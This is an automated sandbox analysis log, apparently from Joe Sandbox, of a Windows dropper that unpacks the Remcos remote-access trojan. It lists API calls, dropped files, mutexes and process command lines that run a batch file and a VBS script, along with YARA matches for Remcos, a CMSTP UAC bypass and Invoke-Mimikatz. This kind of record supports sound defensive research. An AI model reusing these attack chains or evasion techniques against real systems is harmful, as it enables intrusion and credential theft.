                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636342D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,15_2_00007FF636342D70
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636341BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,15_2_00007FF636341BF4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,33_2_004167EF
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile created: C:\Windows\DesignerQuietJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile created: C:\Windows\HardwoodBrochureJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile created: C:\Windows\ConcreteChaosJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile created: C:\Windows\RespondingBeansJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile created: C:\Windows\PostsPatrickJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A666C40_2_00007FF7D2A666C4
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A640C40_2_00007FF7D2A640C4
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A62DB40_2_00007FF7D2A62DB4
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A66CA40_2_00007FF7D2A66CA4
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A61D280_2_00007FF7D2A61D28
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A65D900_2_00007FF7D2A65D90
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A61C0C0_2_00007FF7D2A61C0C
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A635300_2_00007FF7D2A63530
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00405E509_2_00405E50
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_0040497C11_2_0040497C
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_00406ED211_2_00406ED2
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_004074BB11_2_004074BB
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636345F8015_2_00007FF636345F80
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF6363441B415_2_00007FF6363441B4
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636341D1015_2_00007FF636341D10
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636346F1415_2_00007FF636346F14
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636342EDC15_2_00007FF636342EDC
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF6363468F015_2_00007FF6363468F0
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636345F7E15_2_00007FF636345F7E
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF63634366E15_2_00007FF63634366E
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636341BF415_2_00007FF636341BF4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043706A33_2_0043706A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041400533_2_00414005
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043E11C33_2_0043E11C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004541D933_2_004541D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004381E833_2_004381E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041F18B33_2_0041F18B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0044627033_2_00446270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043E34B33_2_0043E34B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004533AB33_2_004533AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0042742E33_2_0042742E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043756633_2_00437566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043E5A833_2_0043E5A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004387F033_2_004387F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043797E33_2_0043797E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004339D733_2_004339D7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0044DA4933_2_0044DA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00427AD733_2_00427AD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041DBF333_2_0041DBF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00427C4033_2_00427C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00437DB333_2_00437DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00435EEB33_2_00435EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043DEED33_2_0043DEED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00426E9F33_2_00426E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_1001719433_2_10017194
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_1000B5C133_2_1000B5C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044B04037_2_0044B040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0043610D37_2_0043610D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044731037_2_00447310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044A49037_2_0044A490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0040755A37_2_0040755A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0043C56037_2_0043C560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044B61037_2_0044B610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044D6C037_2_0044D6C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_004476F037_2_004476F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044B87037_2_0044B870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044081D37_2_0044081D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0041495737_2_00414957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_004079EE37_2_004079EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00407AEB37_2_00407AEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044AA8037_2_0044AA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00412AA937_2_00412AA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00404B7437_2_00404B74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00404B0337_2_00404B03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0044BBD837_2_0044BBD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00404BE537_2_00404BE5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00404C7637_2_00404C76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00415CFE37_2_00415CFE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00416D7237_2_00416D72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00446D3037_2_00446D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00446D8B37_2_00446D8B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00406E8F37_2_00406E8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0040503838_2_00405038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0041208C38_2_0041208C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_004050A938_2_004050A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0040511A38_2_0040511A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0043C13A38_2_0043C13A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_004051AB38_2_004051AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0044930038_2_00449300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0040D32238_2_0040D322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0044A4F038_2_0044A4F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0043A5AB38_2_0043A5AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0041363138_2_00413631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0044669038_2_00446690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0044A73038_2_0044A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_004398D838_2_004398D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_004498E038_2_004498E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0044A88638_2_0044A886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0043DA0938_2_0043DA09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00438D5E38_2_00438D5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00449ED038_2_00449ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_0041FE8338_2_0041FE83
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00430F5438_2_00430F54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_004050C240_2_004050C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_004014AB40_2_004014AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_0040513340_2_00405133
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_004051A440_2_004051A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_0040124640_2_00401246
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_0040CA4640_2_0040CA46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_0040523540_2_00405235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_004032C840_2_004032C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_0040168940_2_00401689
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00402F6040_2_00402F60
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: String function: 004062A3 appears 57 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                      Source: 6706e721f2c06.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 7024 bytes, 1 file, at 0x2c +A "6706e721f2c06.vbs", ID 1196, number 1, 1 datablock, 0x1503 compression
                      Source: payload[1].exe.9.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6984 bytes, 1 file, at 0x2c +A "one.vbs", ID 699, number 1, 1 datablock, 0x1503 compression
                      Source: MicrosoftServiceUpdater.exe.9.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6984 bytes, 1 file, at 0x2c +A "one.vbs", ID 699, number 1, 1 datablock, 0x1503 compression
                      Source: 6706e721f2c06.exeStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                      Source: payload[1].exe.9.drStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                      Source: MicrosoftServiceUpdater.exe.9.drStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                      Source: 6706e721f2c06.exeBinary or memory string: OriginalFilename vs 6706e721f2c06.exe
                      Source: 6706e721f2c06.exe, 00000000.00000000.1324785421.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 6706e721f2c06.exe
                      Source: 6706e721f2c06.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 6706e721f2c06.exe
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4464
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4464
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4464Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4464
                      Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 1280, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 1280, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: legit[1].exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                      Source: PdfReaderEn.EXE.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                      Source: 7.2.powershell.exe.1f6b3700000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                      Source: 7.2.powershell.exe.1f6b3700000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 7.2.powershell.exe.1f6b3700000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 7.2.powershell.exe.1f6c3b51768.1.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                      Source: 7.2.powershell.exe.1f6c3b51768.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 7.2.powershell.exe.1f6c3b51768.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@74/45@10/9
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A66CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF7D2A66CA4
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A61C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7D2A61C0C
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636341BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,15_2_00007FF636341BF4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,33_2_0041798D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,40_2_00410DE1
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A666C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF7D2A666C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,33_2_0040F4AF
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_004024FB CoCreateInstance,11_2_004024FB
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A67AC8 FindResourceA,LoadResource,DialogBoxIndirectParamA,FreeResource,0_2_00007FF7D2A67AC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,33_2_0041AADB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\09QMQHZI.txtJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UP4CTA
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 6706e721f2c06.vbs
                      Source: 6706e721f2c06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
